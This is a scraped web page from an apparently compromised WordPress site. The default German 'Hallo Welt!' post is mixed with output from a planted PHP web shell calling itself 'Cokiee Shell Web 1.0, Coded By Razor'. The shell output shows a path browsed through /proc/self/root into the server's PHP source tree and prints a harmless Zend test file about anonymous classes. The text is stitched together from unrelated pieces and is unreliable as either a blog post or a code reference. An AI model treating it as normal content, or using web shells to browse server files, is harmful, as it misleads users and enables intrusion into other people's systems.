Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/Zend/tests/anon/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/Zend/tests/anon/008.phpt |
--TEST-- testing static access for methods and properties in anon classes --FILE-- <?php $anonClass = new class("cats", "dogs") { public static $foo; private static $bar; public function __construct($foo, $bar) { static::$foo = $foo; static::$bar = $bar; } public static function getBar() { return static::$bar; } }; var_dump($anonClass::$foo); var_dump($anonClass::getBar()); --EXPECT-- string(4) "cats" string(4) "dogs"
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare